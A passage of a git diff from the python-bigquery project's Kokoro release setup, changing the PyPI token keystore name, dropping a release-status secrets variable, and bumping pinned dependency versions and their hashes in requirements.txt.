"${KOKORO_KEYSTORE_DIR}/73713_google-cloud-pypi-token-keystore-3") cd github/python-bigquery python3 setup.py sdist bdist_wheel twine upload --username __token__ --password "${TWINE_PASSWORD}" dist/* diff --git a/.kokoro/release/common.cfg b/.kokoro/release/common.cfg index 43b5a1f27..6f57163f5 100644 --- a/.kokoro/release/common.cfg +++ b/.kokoro/release/common.cfg @@ -28,17 +28,11 @@ before_action { fetch_keystore { keystore_resource { keystore_config_id: 73713 - keyname: "google-cloud-pypi-token-keystore-2" + keyname: "google-cloud-pypi-token-keystore-3" } } } -# Tokens needed to report release status back to GitHub -env_vars: { - key: "SECRET_MANAGER_KEYS" - value: "releasetool-publish-reporter-app,releasetool-publish-reporter-googleapis-installation,releasetool-publish-reporter-pem" -} - # Store the packages we uploaded to PyPI. That way, we have a record of exactly # what we published, which we can use to generate SBOMs and attestations. action { diff --git a/.kokoro/requirements.txt b/.kokoro/requirements.txt index 9622baf0b..006d8ef93 100644 --- a/.kokoro/requirements.txt +++ b/.kokoro/requirements.txt @@ -4,79 +4,94 @@ # # pip-compile --allow-unsafe --generate-hashes requirements.in # -argcomplete==3.4.0 \ - --hash=sha256:69a79e083a716173e5532e0fa3bef45f793f4e61096cf52b5a42c0211c8b8aa5 \ - --hash=sha256:c2abcdfe1be8ace47ba777d4fce319eb13bf8ad9dace8d085dcad6eded88057f +argcomplete==3.5.1 \ + --hash=sha256:1a1d148bdaa3e3b93454900163403df41448a248af01b6e849edc5ac08e6c363 \ + --hash=sha256:eb1ee355aa2557bd3d0145de7b06b2a45b0ce461e1e7813f5d066039ab4177b4 # via nox -attrs==23.2.0 \ - --hash=sha256:935dc3b529c262f6cf76e50877d35a4bd3c1de194fd41f47a2b7ae8f19971f30 \ - --hash=sha256:99b87a485a5820b23b879f04c2305b44b951b502fd64be915879d77a7e8fc6f1 +attrs==24.2.0 \ + --hash=sha256:5cfb1b9148b5b086569baec03f20d7b6bf3bcacc9a42bebf87ffaaca362f6346 \ + --hash=sha256:81921eb96de3191c8258c199618104dd27ac608d9366f5e35d011eae1867ede2 # via gcp-releasetool backports-tarfile==1.2.0 \ --hash=sha256:77e284d754527b01fb1e6fa8a1afe577858ebe4e9dad8919e34c862cb399bc34 \ --hash=sha256:d75e02c268746e1b8144c278978b6e98e85de6ad16f8e4b0844a154557eca991 # via jaraco-context -cachetools==5.3.3 \ - --hash=sha256:0abad1021d3f8325b2fc1d2e9c8b9c9d57b04c3932657a72465447332c24d945 \ - --hash=sha256:ba29e2dfa0b8b556606f097407ed1aa62080ee108ab0dc5ec9d6a723a007d105 +cachetools==5.5.0 \ + --hash=sha256:02134e8439cdc2ffb62023ce1debca2944c3f289d66bb17ead3ab3dede74b292 \ + --hash=sha256:2cc24fb4cbe39633fb7badd9db9ca6295d766d9c2995f245725a46715d050f2a # via google-auth -certifi==2024.7.4 \ - --hash=sha256:5a1e7645bc0ec61a09e26c36f6106dd4cf40c6db3a1fb6352b0244e7fb057c7b \ - --hash=sha256:c198e21b1289c2ab85ee4e67bb4b4ef3ead0892059901a8d5b622f24a1101e90 +certifi==2024.8.30 \ + --hash=sha256:922820b53db7a7257ffbda3f597266d435245903d80737e34f8a45ff3e3230d8 \ + --hash=sha256:bec941d2aa8195e248a60b31ff9f0558284cf01a52591ceda73ea9afffd69fd9 # via requests -cffi==1.16.0 \ - --hash=sha256:0c9ef6ff37e974b73c25eecc13952c55bceed9112be2d9d938ded8e856138bcc \ - --hash=sha256:131fd094d1065b19540c3d72594260f118b231090295d8c34e19a7bbcf2e860a \ - --hash=sha256:1b8ebc27c014c59692bb2664c7d13ce7a6e9a629be20e54e7271fa696ff2b417 \ - --hash=sha256:2c56b361916f390cd758a57f2e16233eb4f64bcbeee88a4881ea90fca14dc6ab \ - --hash=sha256:2d92b25dbf6cae33f65005baf472d2c245c050b1ce709cc4588cdcdd5495b520 \ - --hash=sha256:31d13b0f99e0836b7ff893d37af07366ebc90b678b6664c955b54561fc36ef36 \ - --hash=sha256:32c68ef735dbe5857c810328cb2481e24722a59a2003018885514d4c09af9743 \ - --hash=sha256:3686dffb02459559c74dd3d81748269ffb0eb027c39a6fc99502de37d501faa8 \ - --hash=sha256:582215a0e9adbe0e379761260553ba11c58943e4bbe9c36430c4ca6ac74b15ed \ - --hash=sha256:5b50bf3f55561dac5438f8e70bfcdfd74543fd60df5fa5f62d94e5867deca684 \ - --hash=sha256:5bf44d66cdf9e893637896c7faa22298baebcd18d1ddb6d2626a6e39793a1d56 \ - --hash=sha256:6602bc8dc6f3a9e02b6c22c4fc1e47aa50f8f8e6d3f78a5e16ac33ef5fefa324 \ - --hash=sha256:673739cb539f8cdaa07d92d02efa93c9ccf87e345b9a0b556e3ecc666718468d \ - --hash=sha256:68678abf380b42ce21a5f2abde8efee05c114c2fdb2e9eef2efdb0257fba1235 \ - --hash=sha256:68e7c44931cc171c54ccb702482e9fc723192e88d25a0e133edd7aff8fcd1f6e \ - --hash=sha256:6b3d6606d369fc1da4fd8c357d026317fbb9c9b75d36dc16e90e84c26854b088 \ - --hash=sha256:748dcd1e3d3d7cd5443ef03ce8685043294ad6bd7c02a38d1bd367cfd968e000 \ - --hash=sha256:7651c50c8c5ef7bdb41108b7b8c5a83013bfaa8a935590c5d74627c047a583c7 \ - --hash=sha256:7b78010e7b97fef4bee1e896df8a4bbb6712b7f05b7ef630f9d1da00f6444d2e \ - --hash=sha256:7e61e3e4fa664a8588aa25c883eab612a188c725755afff6289454d6362b9673 \ - --hash=sha256:80876338e19c951fdfed6198e70bc88f1c9758b94578d5a7c4c91a87af3cf31c \ - --hash=sha256:8895613bcc094d4a1b2dbe179d88d7fb4a15cee43c052e8885783fac397d91fe \ - --hash=sha256:88e2b3c14bdb32e440be531ade29d3c50a1a59cd4e51b1dd8b0865c54ea5d2e2 \ - --hash=sha256:8f8e709127c6c77446a8c0a8c8bf3c8ee706a06cd44b1e827c3e6a2ee6b8c098 \ - --hash=sha256:9cb4a35b3642fc5c005a6755a5d17c6c8b6bcb6981baf81cea8bfbc8903e8ba8 \ - --hash=sha256:9f90389693731ff1f659e55c7d1640e2ec43ff725cc61b04b2f9c6d8d017df6a \ - --hash=sha256:a09582f178759ee8128d9270cd1344154fd473bb77d94ce0aeb2a93ebf0feaf0 \ - --hash=sha256:a6a14b17d7e17fa0d207ac08642c8820f84f25ce17a442fd15e27ea18d67c59b \ - --hash=sha256:a72e8961a86d19bdb45851d8f1f08b041ea37d2bd8d4fd19903bc3083d80c896 \ - --hash=sha256:abd808f9c129ba2beda4cfc53bde801e5bcf9d6e0f22f095e45327c038bfe68e \ - --hash=sha256:ac0f5edd2360eea2f1daa9e26a41db02dd4b0451b48f7c318e217ee092a213e9 \ - --hash=sha256:b29ebffcf550f9da55bec9e02ad430c992a87e5f512cd63388abb76f1036d8d2 \ - --hash=sha256:b2ca4e77f9f47c55c194982e10f058db063937845bb2b7a86c84a6cfe0aefa8b \ - --hash=sha256:b7be2d771cdba2942e13215c4e340bfd76398e9227ad10402a8767ab1865d2e6 \ - --hash=sha256:b84834d0cf97e7d27dd5b7f3aca7b6e9263c56308ab9dc8aae9784abb774d404 \ - --hash=sha256:b86851a328eedc692acf81fb05444bdf1891747c25af7529e39ddafaf68a4f3f \ - --hash=sha256:bcb3ef43e58665bbda2fb198698fcae6776483e0c4a631aa5647806c25e02cc0 \ - --hash=sha256:c0f31130ebc2d37cdd8e44605fb5fa7ad59049298b3f745c74fa74c62fbfcfc4 \ - --hash=sha256:c6a164aa47843fb1b01e941d385aab7215563bb8816d80ff3a363a9f8448a8dc \ - --hash=sha256:d8a9d3ebe49f084ad71f9269834ceccbf398253c9fac910c4fd7053ff1386936 \ - --hash=sha256:db8e577c19c0fda0beb7e0d4e09e0ba74b1e4c092e0e40bfa12fe05b6f6d75ba \ - --hash=sha256:dc9b18bf40cc75f66f40a7379f6a9513244fe33c0e8aa72e2d56b0196a7ef872 \ - --hash=sha256:e09f3ff613345df5e8c3667da1d918f9149bd623cd9070c983c013792a9a62eb \ - --hash=sha256:e4108df7fe9b707191e55f33efbcb2d81928e10cea45527879a4749cbe472614 \ - --hash=sha256:e6024675e67af929088fda399b2094574609396b1decb609c55fa58b028a32a1 \ - --hash=sha256:e70f54f1796669ef691ca07d046cd81a29cb4deb1e5f942003f401c0c4a2695d \ - --hash=sha256:e715596e683d2ce000574bae5d07bd522c781a822866c20495e52520564f0969 \ - --hash=sha256:e760191dd42581e023a68b758769e2da259b5d52e3103c6060ddc02c9edb8d7b \ - --hash=sha256:ed86a35631f7bfbb28e108dd96773b9d5a6ce4811cf6ea468bb6a359b256b1e4 \ - --hash=sha256:ee07e47c12890ef248766a6e55bd38ebfb2bb8edd4142d56db91b21ea68b7627 \ - --hash=sha256:fa3a0128b152627161ce47201262d3140edb5a5c3da88d73a1b790a959126956 \ - --hash=sha256:fcc8eb6d5902bb1cf6dc4f187ee3ea80a1eba0a89aba40a5cb20a5087d961357 +cffi==1.17.1 \ + --hash=sha256:045d61c734659cc045141be4bae381a41d89b741f795af1dd018bfb532fd0df8 \ + --hash=sha256:0984a4925a435b1da406122d4d7968dd861c1385afe3b45ba82b750f229811e2 \ + --hash=sha256:0e2b1fac190ae3ebfe37b979cc1ce69c81f4e4fe5746bb401dca63a9062cdaf1 \ + --hash=sha256:0f048dcf80db46f0098ccac01132761580d28e28bc0f78ae0d58048063317e15 \ + --hash=sha256:1257bdabf294dceb59f5e70c64a3e2f462c30c7ad68092d01bbbfb1c16b1ba36 \ + --hash=sha256:1c39c6016c32bc48dd54561950ebd6836e1670f2ae46128f67cf49e789c52824 \ + --hash=sha256:1d599671f396c4723d016dbddb72fe8e0397082b0a77a4fab8028923bec050e8 \ + --hash=sha256:28b16024becceed8c6dfbc75629e27788d8a3f9030691a1dbf9821a128b22c36 \ + --hash=sha256:2bb1a08b8008b281856e5971307cc386a8e9c5b625ac297e853d36da6efe9c17 \ + --hash=sha256:30c5e0cb5ae493c04c8b42916e52ca38079f1b235c2f8ae5f4527b963c401caf \ + --hash=sha256:31000ec67d4221a71bd3f67df918b1f88f676f1c3b535a7eb473255fdc0b83fc \ + --hash=sha256:386c8bf53c502fff58903061338ce4f4950cbdcb23e2902d86c0f722b786bbe3 \ + --hash=sha256:3edc8d958eb099c634dace3c7e16560ae474aa3803a5df240542b305d14e14ed \ + --hash=sha256:45398b671ac6d70e67da8e4224a065cec6a93541bb7aebe1b198a61b58c7b702 \ + --hash=sha256:46bf43160c1a35f7ec506d254e5c890f3c03648a4dbac12d624e4490a7046cd1 \ + --hash=sha256:4ceb10419a9adf4460ea14cfd6bc43d08701f0835e979bf821052f1805850fe8 \ + --hash=sha256:51392eae71afec0d0c8fb1a53b204dbb3bcabcb3c9b807eedf3e1e6ccf2de903 \ + --hash=sha256:5da5719280082ac6bd9aa7becb3938dc9f9cbd57fac7d2871717b1feb0902ab6 \ + --hash=sha256:610faea79c43e44c71e1ec53a554553fa22321b65fae24889706c0a84d4ad86d \ + --hash=sha256:636062ea65bd0195bc012fea9321aca499c0504409f413dc88af450b57ffd03b \ + --hash=sha256:6883e737d7d9e4899a8a695e00ec36bd4e5e4f18fabe0aca0efe0a4b44cdb13e \ + --hash=sha256:6b8b4a92e1c65048ff98cfe1f735ef8f1ceb72e3d5f0c25fdb12087a23da22be \ + --hash=sha256:6f17be4345073b0a7b8ea599688f692ac3ef23ce28e5df79c04de519dbc4912c \ + --hash=sha256:706510fe141c86a69c8ddc029c7910003a17353970cff3b904ff0686a5927683 \ + --hash=sha256:72e72408cad3d5419375fc87d289076ee319835bdfa2caad331e377589aebba9 \ + --hash=sha256:733e99bc2df47476e3848417c5a4540522f234dfd4ef3ab7fafdf555b082ec0c \ + --hash=sha256:7596d6620d3fa590f677e9ee430df2958d2d6d6de2feeae5b20e82c00b76fbf8 \ + --hash=sha256:78122be759c3f8a014ce010908ae03364d00a1f81ab5c7f4a7a5120607ea56e1 \ + --hash=sha256:805b4371bf7197c329fcb3ead37e710d1bca9da5d583f5073b799d5c5bd1eee4 \ + --hash=sha256:85a950a4ac9c359340d5963966e3e0a94a676bd6245a4b55bc43949eee26a655 \ + --hash=sha256:8f2cdc858323644ab277e9bb925ad72ae0e67f69e804f4898c070998d50b1a67 \ + --hash=sha256:9755e4345d1ec879e3849e62222a18c7174d65a6a92d5b346b1863912168b595 \ + --hash=sha256:98e3969bcff97cae1b2def8ba499ea3d6f31ddfdb7635374834cf89a1a08ecf0 \ + --hash=sha256:a08d7e755f8ed21095a310a693525137cfe756ce62d066e53f502a83dc550f65 \ + --hash=sha256:a1ed2dd2972641495a3ec98445e09766f077aee98a1c896dcb4ad0d303628e41 \ + --hash=sha256:a24ed04c8ffd54b0729c07cee15a81d964e6fee0e3d4d342a27b020d22959dc6 \ + --hash=sha256:a45e3c6913c5b87b3ff120dcdc03f6131fa0065027d0ed7ee6190736a74cd401 \ + --hash=sha256:a9b15d491f3ad5d692e11f6b71f7857e7835eb677955c00cc0aefcd0669adaf6 \ + --hash=sha256:ad9413ccdeda48c5afdae7e4fa2192157e991ff761e7ab8fdd8926f40b160cc3 \ + --hash=sha256:b2ab587605f4ba0bf81dc0cb08a41bd1c0a5906bd59243d56bad7668a6fc6c16 \ + --hash=sha256:b62ce867176a75d03a665bad002af8e6d54644fad99a3c70905c543130e39d93 \ + --hash=sha256:c03e868a0b3bc35839ba98e74211ed2b05d2119be4e8a0f224fba9384f1fe02e \ + --hash=sha256:c59d6e989d07460165cc5ad3c61f9fd8f1b4796eacbd81cee78957842b834af4 \ + --hash=sha256:c7eac2ef9b63c79431bc4b25f1cd649d7f061a28808cbc6c47b534bd789ef964 \ + --hash=sha256:c9c3d058ebabb74db66e431095118094d06abf53284d9c81f27300d0e0d8bc7c \ + --hash=sha256:ca74b8dbe6e8e8263c0ffd60277de77dcee6c837a3d0881d8c1ead7268c9e576 \ + --hash=sha256:caaf0640ef5f5517f49bc275eca1406b0ffa6aa184892812030f04c2abf589a0 \ + --hash=sha256:cdf5ce3acdfd1661132f2a9c19cac174758dc2352bfe37d98aa7512c6b7178b3 \ + --hash=sha256:d016c76bdd850f3c626af19b0542c9677ba156e4ee4fccfdd7848803533ef662 \ + --hash=sha256:d01b12eeeb4427d3110de311e1774046ad344f5b1a7403101878976ecd7a10f3 \ + --hash=sha256:d63afe322132c194cf832bfec0dc69a99fb9bb6bbd550f161a49e9e855cc78ff \ + --hash=sha256:da95af8214998d77a98cc14e3a3bd00aa191526343078b530ceb0bd710fb48a5 \ + --hash=sha256:dd398dbc6773384a17fe0d3e7eeb8d1a21c2200473ee6806bb5e6a8e62bb73dd \ + --hash=sha256:de2ea4b5833625383e464549fec1bc395c1bdeeb5f25c4a3a82b5a8c756ec22f \ + --hash=sha256:de55b766c7aa2e2a3092c51e0483d700341182f08e67c63630d5b6f200bb28e5 \ + --hash=sha256:df8b1c11f177bc2313ec4b2d46baec87a5f3e71fc8b45dab2ee7cae86d9aba14 \ + --hash=sha256:e03eab0a8677fa80d646b5ddece1cbeaf556c313dcfac435ba11f107ba117b5d \ + --hash=sha256:e221cf152cff04059d011ee126477f0d9588303eb57e88923578ace7baad17f9 \ + --hash=sha256:e31ae45bc2e29f6b2abd0de1cc3b9d5205aa847cafaecb8af1476a609a2f6eb7 \ + --hash=sha256:edae79245293e15384b51f88b00613ba9f7198016a5948b5dddf4917d4d26382 \ + --hash=sha256:f1e22e8c4419538cb197e4dd60acc919d7696e5ef98ee4da4e01d3f8cfa4cc5a \ + --hash=sha256:f3a2b4222ce6b60e2e8b337bb9596923045681d71e5a082783484d845390938e \ + --hash=sha256:f6a16c31041f09ead72d69f583767292f750d24913dadacf5756b966aacb3f1a \ + --hash=sha256:f75c7ab1f9e4aca5414ed4d8e5c0e303a34f4421f8a0d47a4d019ceff0ab6af4 \ + --hash=sha256:f79fc4fc25f1c8698ff97788206bb3c2598949bfe0fef03d299eb1b5356ada99 \ + --hash=sha256:f7f5baafcc48261359e14bcd6d9bff6d4b28d9103847c9e136694cb0501aef87 \ + --hash=sha256:fc48c783f9c87e60831201f2cce7f3b2e4846bf4d8728eabe54d60700b318a0b # via cryptography charset-normalizer==2.1.1 \ --hash=sha256:5a3d016c7c547f69d6f81fb0db9449ce888b418b5b9952cc5e6e66843e9dd845 \ @@ -97,72 +112,67 @@ colorlog==6.8.2 \ # via # gcp-docuploader # nox -cryptography==42.0.8 \ - --hash=sha256:013629ae70b40af70c9a7a5db40abe5d9054e6f4380e50ce769947b73bf3caad \ - --hash=sha256:2346b911eb349ab547076f47f2e035fc8ff2c02380a7cbbf8d87114fa0f1c583 \ - --hash=sha256:2f66d9cd9147ee495a8374a45ca445819f8929a3efcd2e3df6428e46c3cbb10b \ - --hash=sha256:2f88d197e66c65be5e42cd72e5c18afbfae3f741742070e3019ac8f4ac57262c \ - --hash=sha256:31f721658a29331f895a5a54e7e82075554ccfb8b163a18719d342f5ffe5ecb1 \ - --hash=sha256:343728aac38decfdeecf55ecab3264b015be68fc2816ca800db649607aeee648 \ - --hash=sha256:5226d5d21ab681f432a9c1cf8b658c0cb02533eece706b155e5fbd8a0cdd3949 \ - --hash=sha256:57080dee41209e556a9a4ce60d229244f7a66ef52750f813bfbe18959770cfba \ - --hash=sha256:5a94eccb2a81a309806027e1670a358b99b8fe8bfe9f8d329f27d72c094dde8c \ - --hash=sha256:6b7c4f03ce01afd3b76cf69a5455caa9cfa3de8c8f493e0d3ab7d20611c8dae9 \ - --hash=sha256:7016f837e15b0a1c119d27ecd89b3515f01f90a8615ed5e9427e30d9cdbfed3d \ - --hash=sha256:81884c4d096c272f00aeb1f11cf62ccd39763581645b0812e99a91505fa48e0c \ - --hash=sha256:81d8a521705787afe7a18d5bfb47ea9d9cc068206270aad0b96a725022e18d2e \ - --hash=sha256:8d09d05439ce7baa8e9e95b07ec5b6c886f548deb7e0f69ef25f64b3bce842f2 \ - --hash=sha256:961e61cefdcb06e0c6d7e3a1b22ebe8b996eb2bf50614e89384be54c48c6b63d \ - --hash=sha256:9c0c1716c8447ee7dbf08d6db2e5c41c688544c61074b54fc4564196f55c25a7 \ - --hash=sha256:a0608251135d0e03111152e41f0cc2392d1e74e35703960d4190b2e0f4ca9c70 \ - --hash=sha256:a0c5b2b0585b6af82d7e385f55a8bc568abff8923af147ee3c07bd8b42cda8b2 \ - --hash=sha256:ad803773e9df0b92e0a817d22fd8a3675493f690b96130a5e24f1b8fabbea9c7 \ - --hash=sha256:b297f90c5723d04bcc8265fc2a0f86d4ea2e0f7ab4b6994459548d3a6b992a14 \ - --hash=sha256:ba4f0a211697362e89ad822e667d8d340b4d8d55fae72cdd619389fb5912eefe \ - --hash=sha256:c4783183f7cb757b73b2ae9aed6599b96338eb957233c58ca8f49a49cc32fd5e \ - --hash=sha256:c9bb2ae11bfbab395bdd072985abde58ea9860ed84e59dbc0463a5d0159f5b71 \ - --hash=sha256:cafb92b2bc622cd1aa6a1dce4b93307792633f4c5fe1f46c6b97cf67073ec961 \ - --hash=sha256:d45b940883a03e19e944456a558b67a41160e367a719833c53de6911cabba2b7 \ - --hash=sha256:dc0fdf6787f37b1c6b08e6dfc892d9d068b5bdb671198c72072828b80bd5fe4c \ - --hash=sha256:dea567d1b0e8bc5764b9443858b673b734100c2871dc93163f58c46a97a83d28 \ - --hash=sha256:dec9b018df185f08483f294cae6ccac29e7a6e0678996587363dc352dc65c842 \ - --hash=sha256:e3ec3672626e1b9e55afd0df6d774ff0e953452886e06e0f1eb7eb0c832e8902 \ - --hash=sha256:e599b53fd95357d92304510fb7bda8523ed1f79ca98dce2f43c115950aa78801 \ - --hash=sha256:fa76fbb7596cc5839320000cdd5d0955313696d9511debab7ee7278fc8b5c84a \ - --hash=sha256:fff12c88a672ab9c9c1cf7b0c80e3ad9e2ebd9d828d955c126be4fd3e5578c9e +cryptography==43.0.1 \ + --hash=sha256:014f58110f53237ace6a408b5beb6c427b64e084eb451ef25a28308270086494 \ + --hash=sha256:1bbcce1a551e262dfbafb6e6252f1ae36a248e615ca44ba302df077a846a8806 \ + --hash=sha256:203e92a75716d8cfb491dc47c79e17d0d9207ccffcbcb35f598fbe463ae3444d \ + --hash=sha256:27e613d7077ac613e399270253259d9d53872aaf657471473ebfc9a52935c062 \ + --hash=sha256:2bd51274dcd59f09dd952afb696bf9c61a7a49dfc764c04dd33ef7a6b502a1e2 \ + --hash=sha256:38926c50cff6f533f8a2dae3d7f19541432610d114a70808f0926d5aaa7121e4 \ + --hash=sha256:511f4273808ab590912a93ddb4e3914dfd8a388fed883361b02dea3791f292e1 \ + --hash=sha256:58d4e9129985185a06d849aa6df265bdd5a74ca6e1b736a77959b498e0505b85 \ + --hash=sha256:5b43d1ea6b378b54a1dc99dd8a2b5be47658fe9a7ce0a58ff0b55f4b43ef2b84 \ + --hash=sha256:61ec41068b7b74268fa86e3e9e12b9f0c21fcf65434571dbb13d954bceb08042 \ + --hash=sha256:666ae11966643886c2987b3b721899d250855718d6d9ce41b521252a17985f4d \ + --hash=sha256:68aaecc4178e90719e95298515979814bda0cbada1256a4485414860bd7ab962 \ + --hash=sha256:7c05650fe8023c5ed0d46793d4b7d7e6cd9c04e68eabe5b0aeea836e37bdcec2 \ + --hash=sha256:80eda8b3e173f0f247f711eef62be51b599b5d425c429b5d4ca6a05e9e856baa \ + --hash=sha256:8385d98f6a3bf8bb2d65a73e17ed87a3ba84f6991c155691c51112075f9ffc5d \ + --hash=sha256:88cce104c36870d70c49c7c8fd22885875d950d9ee6ab54df2745f83ba0dc365 \ + --hash=sha256:9d3cdb25fa98afdd3d0892d132b8d7139e2c087da1712041f6b762e4f807cc96 \ + --hash=sha256:a575913fb06e05e6b4b814d7f7468c2c660e8bb16d8d5a1faf9b33ccc569dd47 \ + --hash=sha256:ac119bb76b9faa00f48128b7f5679e1d8d437365c5d26f1c2c3f0da4ce1b553d \ + --hash=sha256:c1332724be35d23a854994ff0b66530119500b6053d0bd3363265f7e5e77288d \ + --hash=sha256:d03a475165f3134f773d1388aeb19c2d25ba88b6a9733c5c590b9ff7bbfa2e0c \ + --hash=sha256:d75601ad10b059ec832e78823b348bfa1a59f6b8d545db3a24fd44362a1564cb \ + --hash=sha256:de41fd81a41e53267cb020bb3a7212861da53a7d39f863585d13ea11049cf277 \ + --hash=sha256:e710bf40870f4db63c3d7d929aa9e09e4e7ee219e703f949ec4073b4294f6172 \ + --hash=sha256:ea25acb556320250756e53f9e20a4177515f012c9eaea17eb7587a8c4d8ae034 \ + --hash=sha256:f98bf604c82c416bc829e490c700ca1553eafdf2912a91e23a79d97d9801372a \ + --hash=sha256:fba1007b3ef89946dbbb515aeeb41e30203b004f0b4b00e5e16078b518563289 # via # -r requirements.in # gcp-releasetool # secretstorage -distlib==0.3.8 \ - --hash=sha256:034db59a0b96f8ca18035f36290806a9a6e6bd9d1ff91e45a7f172eb17e51784 \ - --hash=sha256:1530ea13e350031b6312d8580ddb6b27a104275a31106523b8f123787f494f64 +distlib==0.3.9 \ + --hash=sha256:47f8c22fd27c27e25a65601af709b38e4f0a45ea4fc2e710f65755fa8caaaf87 \ + --hash=sha256:a60f20dea646b8a33f3e7772f74dc0b2d0772d2837ee1342a00645c81edf9403 # via virtualenv docutils==0.21.2 \ --hash=sha256:3a6b18732edf182daa3cd12775bbb338cf5691468f91eeeb109deff6ebfa986f \ --hash=sha256:dafca5b9e384f0e419294eb4d2ff9fa826435bf15f15b7bd45723e8ad76811b2 # via readme-renderer -filelock==3.15.4 \ - --hash=sha256:2207938cbc1844345cb01a5a95524dae30f0ce089eba5b00378295a17e3e90cb \ - --hash=sha256:6ca1fffae96225dab4c6eaf1c4f4f28cd2568d3ec2a44e15a08520504de468e7 +filelock==3.16.1 \ + --hash=sha256:2082e5703d51fbf98ea75855d9d5527e33d8ff23099bec374a134febee6946b0 \ + --hash=sha256:c249fbfcd5db47e5e2d6d62198e565475ee65e4831e2561c8e313fa7eb961435 # via virtualenv gcp-docuploader==0.6.5 \ --hash=sha256:30221d4ac3e5a2b9c69aa52fdbef68cc3f27d0e6d0d90e220fc024584b8d2318 \ --hash=sha256:b7458ef93f605b9d46a4bf3a8dc1755dad1f31d030c8679edf304e343b347eea # via -r requirements.in -gcp-releasetool==2.0.1 \ - --hash=sha256:34314a910c08e8911d9c965bd44f8f2185c4f556e737d719c33a41f6a610de96 \ - --hash=sha256:b0d5863c6a070702b10883d37c4bdfd74bf930fe417f36c0c965d3b7c779ae62 +gcp-releasetool==2.1.1 \ + --hash=sha256:25639269f4eae510094f9dbed9894977e1966933211eb155a451deebc3fc0b30 \ + --hash=sha256:845f4ded3d9bfe8cc7fdaad789e83f4ea014affa77785259a7ddac4b243e099e # via -r requirements.in -google-api-core==2.19.1 \ - --hash=sha256:f12a9b8309b5e21d92483bbd47ce2c445861ec7d269ef6784ecc0ea8c1fa6125 \ - --hash=sha256:f4695f1e3650b316a795108a76a1c416e6afb036199d1c1f1f110916df479ffd +google-api-core==2.21.0 \ + --hash=sha256:4a152fd11a9f774ea606388d423b68aa7e6d6a0ffe4c8266f74979613ec09f81 \ + --hash=sha256:6869eacb2a37720380ba5898312af79a4d30b8bca1548fb4093e0697dc4bdf5d # via # google-cloud-core # google-cloud-storage -google-auth==2.31.0 \ - --hash=sha256:042c4702efa9f7d3c48d3a69341c209381b125faa6dbf3ebe56bc7e40ae05c23 \ - --hash=sha256:87805c36970047247c8afe614d4e3af8eceafc1ebba0c679fe75ddd1d575e871 +google-auth==2.35.0 \ + --hash=sha256:25df55f327ef021de8be50bad0dfd4a916ad0de96da86cd05661c9297723ad3f \ + --hash=sha256:f4c64ed4e01e8e8b646ef34c018f8bf3338df0c8e37d8b3bba40e7f574a3278a # via # gcp-releasetool # google-api-core @@ -172,97 +182,56 @@ google-cloud-core==2.4.1 \ --hash=sha256:9b7749272a812bde58fff28868d0c5e2f585b82f37e09a1f6ed2d4d10f134073 \ --hash=sha256:a9e6a4422b9ac5c29f79a0ede9485473338e2ce78d91f2370c01e730eab22e61 # via google-cloud-storage -google-cloud-storage==2.17.0 \ - --hash=sha256:49378abff54ef656b52dca5ef0f2eba9aa83dc2b2c72c78714b03a1a95fe9388 \ - --hash=sha256:5b393bc766b7a3bc6f5407b9e665b2450d36282614b7945e570b3480a456d1e1 +google-cloud-storage==2.18.2 \ + --hash=sha256:97a4d45c368b7d401ed48c4fdfe86e1e1cb96401c9e199e419d289e2c0370166 \ + --hash=sha256:aaf7acd70cdad9f274d29332673fcab98708d0e1f4dceb5a5356aaef06af4d99 # via gcp-docuploader -google-crc32c==1.5.0 \ - --hash=sha256:024894d9d3cfbc5943f8f230e23950cd4906b2fe004c72e29b209420a1e6b05a \ - --hash=sha256:02c65b9817512edc6a4ae7c7e987fea799d2e0ee40c53ec573a692bee24de876 \ - --hash=sha256:02ebb8bf46c13e36998aeaad1de9b48f4caf545e91d14041270d9dca767b780c \ - --hash=sha256:07eb3c611ce363c51a933bf6bd7f8e3878a51d124acfc89452a75120bc436289 \ - --hash=sha256:1034d91442ead5a95b5aaef90dbfaca8633b0247d1e41621d1e9f9db88c36298 \ - --hash=sha256:116a7c3c616dd14a3de8c64a965828b197e5f2d121fedd2f8c5585c547e87b02 \ - --hash=sha256:19e0a019d2c4dcc5e598cd4a4bc7b008546b0358bd322537c74ad47a5386884f \ - --hash=sha256:1c7abdac90433b09bad6c43a43af253e688c9cfc1c86d332aed13f9a7c7f65e2 \ - --hash=sha256:1e986b206dae4476f41bcec1faa057851f3889503a70e1bdb2378d406223994a \ - --hash=sha256:272d3892a1e1a2dbc39cc5cde96834c236d5327e2122d3aaa19f6614531bb6eb \ - --hash=sha256:278d2ed7c16cfc075c91378c4f47924c0625f5fc84b2d50d921b18b7975bd210 \ - --hash=sha256:2ad40e31093a4af319dadf503b2467ccdc8f67c72e4bcba97f8c10cb078207b5 \ - --hash=sha256:2e920d506ec85eb4ba50cd4228c2bec05642894d4c73c59b3a2fe20346bd00ee \ - --hash=sha256:3359fc442a743e870f4588fcf5dcbc1bf929df1fad8fb9905cd94e5edb02e84c \ - --hash=sha256:37933ec6e693e51a5b07505bd05de57eee12f3e8c32b07da7e73669398e6630a \ - --hash=sha256:398af5e3ba9cf768787eef45c803ff9614cc3e22a5b2f7d7ae116df8b11e3314 \ - --hash=sha256:3b747a674c20a67343cb61d43fdd9207ce5da6a99f629c6e2541aa0e89215bcd \ - --hash=sha256:461665ff58895f508e2866824a47bdee72497b091c730071f2b7575d5762ab65 \ - --hash=sha256:4c6fdd4fccbec90cc8a01fc00773fcd5fa28db683c116ee3cb35cd5da9ef6c37 \ - --hash=sha256:5829b792bf5822fd0a6f6eb34c5f81dd074f01d570ed7f36aa101d6fc7a0a6e4 \ - --hash=sha256:596d1f98fc70232fcb6590c439f43b350cb762fb5d61ce7b0e9db4539654cc13 \ - --hash=sha256:5ae44e10a8e3407dbe138984f21e536583f2bba1be9491239f942c2464ac0894 \ - --hash=sha256:635f5d4dd18758a1fbd1049a8e8d2fee4ffed124462d837d1a02a0e009c3ab31 \ - --hash=sha256:64e52e2b3970bd891309c113b54cf0e4384762c934d5ae56e283f9a0afcd953e \ - --hash=sha256:66741ef4ee08ea0b2cc3c86916ab66b6aef03768525627fd6a1b34968b4e3709 \ - --hash=sha256:67b741654b851abafb7bc625b6d1cdd520a379074e64b6a128e3b688c3c04740 \ - --hash=sha256:6ac08d24c1f16bd2bf5eca8eaf8304812f44af5cfe5062006ec676e7e1d50afc \ - --hash=sha256:6f998db4e71b645350b9ac28a2167e6632c239963ca9da411523bb439c5c514d \ - --hash=sha256:72218785ce41b9cfd2fc1d6a017dc1ff7acfc4c17d01053265c41a2c0cc39b8c \ - 